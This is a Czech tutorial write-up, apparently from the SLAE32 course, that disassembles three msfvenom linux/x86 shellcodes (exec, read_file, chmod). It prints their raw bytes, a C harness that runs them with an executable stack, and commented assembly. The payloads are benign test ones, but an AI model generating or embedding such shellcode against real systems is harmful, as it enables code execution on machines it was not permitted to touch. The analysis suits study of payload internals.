Analýza vybraných 32bitových MSFvenom shellcodů

V pátém textu této 32bitové série budou analyzovány 3 vybrané shellcody vygenerované pomocí msfvenom pro linux/x86. K analýze bude použito Libemu, gdb a ndisasm.

Všechny dostupné payloady v msfvenom můžeme vidět pomocí:

 • msfvenom ––list payloads | grep linux/x86

Za účelem analýzy byly vybrány následující payloady:

 • linux/x86/exec
 • linux/x86/read_file
 • linux/x86/chmod

linux/x86/exec:

Nejdřív ze všeho potřebujeme vědět, jaké jsou požadované nastavení pro vygenerování tohoto shellcodu:

 • msfvenom -p linux/x86/exec ––list-options

Je zde pouze jedno požadované nastavení a to „CMD“. V našem případě použijeme whoami.

Vytvoříme shellcode v C:

 • msfvenom -p linux/x86/exec CMD=whoami -f c

Poté vložíme do C skriptu, spustíme a spočítáme délku shellcodu:

#include<stdio.h>
#include<string.h>
 
unsigned char code[] = \
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x77"
"\x68\x6f\x61\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80";
 
main()
{
printf("Shellcode Lenght: %d\n", strlen(code));
 
int (*ret)() = (int(*)())code;
 
ret();
 
}

Zkompilujeme:

 • gcc -fno-stack-protector -z execstack shellcode-exec.c -o shellcode-exec

Jak můžeme vidět, shellcode funguje. Nyní jej můžeme analyzovat například pomocí Libemu:

 • msfvenom -p linux/x86/exec CMD=whoami R | /opt/libemu/tools/sctest/sctest -vvv -Ss 100000 -G exec.dot
 • dot exec.dot -T png -o exec.png

Shellcode používá pouze jeden syscall a to execve.

 • grep 11 /usr/include/i386-linux-gnu/asm/unistd_32.h
  #define __NR_execve              11
 • int execve(const char *filename, char *const argv[],
               char *const envp[]);

Nyní můžeme analyzovat syscall:

 • EAX = execve()
 • EBX = filename = /bin/sh, 0x0
 • ECX = argv = “/bin/sh, -c whoami”
 • EDX = envp = 0

Jak můžeme vidět, msfvenom používá instrukci “call 0x1”. Díky tomu je uložen příkaz “whoami” do stacku. Můžeme jej analyzovat pomocí gdb.

 • gdb ./shellcode-exec -q
 • set disassembly-flavor intel
 • break *&code
 • run
 • disas/r

Jak můžeme vidět, “\x69\x6d\x61\x61\x6f\x68\x77” = “whoami”

To stejné můžeme vidět manuální analýzou ECX:


global _start
 
section .text
 
_start:
 
  push byte 0xb       ; syscall execve()
  pop eax          ; EAX = syscall 11
  cwd            ; EDX = 0
  push edx
  push word 0x632d     ; "-c"
  mov edi, esp       ; ESP -> EDI
  push dword 0x68732f    ; "/sh"
  push dword 0x6e69622f   ; "/bin"
  mov ebx, esp       ; ESP -> EBX
  push edx         ; EDX = 0
  call 0x1         ; storing the "whoami" command into the stack
  push edi
  push ebx
  mov ecx, esp       ; ECX (/bin/bash -c whoami) -> stack
  int 0x80

linux/x86/read_file:

Všechny povinné možnosti nastavení můžeme vidět pomocí:

 • msfvenom -p linux/x86/read_file ––list-options

Jsou zde dvě povinné nastavení, a to file descriptor a PATH.

Shellcode v C si můžeme vytvořit pomocí:

 • msfvenom -p linux/x86/read_file FD=1 PATH=/tmp/slae.txt -f c

Potom můžeme pomocí jednoduchého C skriptu spočítat délku shellcode:

#include<stdio.h>
#include<string.h>
 
unsigned char code[] = \
"\xeb\x36\xb8\x05\x00\x00\x00\x5b\x31\xc9\xcd\x80\x89\xc3\xb8"
"\x03\x00\x00\x00\x89\xe7\x89\xf9\xba\x00\x10\x00\x00\xcd\x80"
"\x89\xc2\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xcd\x80\xb8"
"\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xc5\xff\xff"
"\xff\x2f\x74\x6d\x70\x2f\x73\x6c\x61\x65\x2e\x74\x78\x74\x00";
 
main()
{
printf("Shellcode Lenght: %d\n", strlen(code));
 
int (*ret)() = (int(*)())code;
 
ret();
 
}

Následně zkompilujeme C script a spustíme jej:

 • gcc -fno-stack-protector -z execstack shellcode-readfile.c -o shellcode-readfile

Jak můžeme vidět na screenu výše, shellcode funguje. Nyní můžeme shellcode analyzovat pomocí ndisasm:

 • msfvenom -p linux/x86/read_file PATH=/tmp/slae.txt | ndisasm -u –

Můžeme vidět 4 syscally:

 • EAX 0x5 = open
 • EAX 0x3 = read
 • EAX 0x4 = write
 • EAX 0x1 = exit

PATH “/tmp/slae.txt”

; Filename: exec.nasm
; Author: SLAE-14209
 
global _start
 
section .text
 
_start:
 
  jmp short 0x38    
  mov eax, 0x5     ; syscall open()
  pop ebx       ; pop address "txt.eals/pmt/" into EBX
  xor ecx, ecx     ; zeroize ECX register
  int 0x80       ; int open(const char *pathname, int flags);
  
  mov ebx, eax
  mov eax, 0x3     ; syscall read()
  mov edi, esp     ; ESP -> EDI
  mov ecx, edi     ; ESP -> ECX
  mov edx, 0x1000   ; 0x1000 = 4096
  int 0x80       ; int read(int fd, void *buf, size_t count);
  
  mov edx, eax
  mov eax, 0x4     ; syscall write()
  mov ebx, 0x1     ; STDOUT = 1
  int 0x80       ; int write(int fd, const void *buf, size_t count);
  
  mov eax, 0x1     ; syscall exit()
  mov ebx, 0x0     ; exit
  int 0x80
  
  call 0x2
  das         ;---|
  jz 0xad       ;  |
  jo 0x71       ;  |
  jnc 0xb0       ;  |--> "txt.eals/pmt/"
  popa         ;  |
  cs jz 0xc1      ;  |
  jz 0x4b       ;---|

linux/x86/chmod:

Všechny povinné možnosti nastavení můžeme vidět pomocí:

 • msfvenom -p linux/x86/chmod ––list-option

Jsou zde dvě povinné nastavení, a to FILE a MODE.

Shellcode v C si můžeme vytvořit pomocí:

 • msfvenom -p linux/x86/chmod FILE=/tmp/slae.txt MODE=0777 -f c

Potom můžeme pomocí jednoduchého C skriptu spočítat délku shellcode:

#include<stdio.h>
#include<string.h>
 
unsigned char code[] = \
"\x99\x6a\x0f\x58\x52\xe8\x0e\x00\x00\x00\x2f\x74\x6d\x70\x2f"
"\x73\x6c\x61\x65\x2e\x74\x78\x74\x00\x5b\x68\xff\x01\x00\x00"
"\x59\xcd\x80\x6a\x01\x58\xcd\x80";
 
main()
{
printf("Shellcode Lenght: %d\n", strlen(code));
 
int (*ret)() = (int(*)())code;
 
ret();
 
}

Následně zkompilujeme C script a spustíme jej:

 • gcc -fno-stack-protector -z execstack shellcode-chmod.c -o shellcode-chmod

Jak můžeme vidět na screenu výše, shellcode funguje. Nyní můžeme shellcode analyzovat pomocí gdb:

 • gdb ./shellcode-exec -q
 • set disassembly-flavor intel
 • break *&code
 • run
 • disas/r

Na začátku můžeme vidět syscall 0xf = 15 = chmod()

 • int chmod(const char *pathname, mode_t mode);

Dále můžeme vidět: “\x74\x78\x74\x2e\x65\x61\x6c\x73\x2f\x70\x6d\x74\x2f” => “txt.eals/pmt/” a push 0x1ff => 777.

; Filename: chmod.nasm
; Author: SLAE-14209
global _start
section .text
_start:
cdq ; convert double to quad
push 0xf ; syscall chmod() = int chmod(const char *pathname, mode_t mode);
pop eax
push edx
call 0x404058 <code+24>
das ;---|
je ; |
jo ; |--> "txt.eals/pmt/"
jae ; |
popa ; |
gs cs je 0x4040ce ;---|
pop ebx
push dword 0x1ff ; hex 0x1ff = 777 octal 
pop ecx
push byte 0x1 ; syscall exit()
pop eax
int 0x80

Všechny použité soubory můžete nalézt zde: https://github.com/Pal1Sec/SLAE32